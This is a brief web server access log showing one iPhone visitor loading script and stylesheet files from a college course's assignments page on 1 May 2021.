172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /js/debug.js?e&datetime=20210501084113 HTTP/1.1" 200 10964 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /css/tooltip.css?datetime=20210501084113 HTTP/1.1" 200 2300 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /css/debug.css?datetime=20210501084113 HTTP/1.1" 200 17 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /js/tooltip.js?o&datetime=20210501084113 HTTP/1.1" 200 13888 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
172.58.86.207 - - [01/May/2021:08:41:14 -0500] "GET /js/select.js?e&datetime=20210501084113 HTTP/1.1" 200 1790 "https://cst.ridgewater.edu/JimMartinson/CST1611/?Assignments" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1"
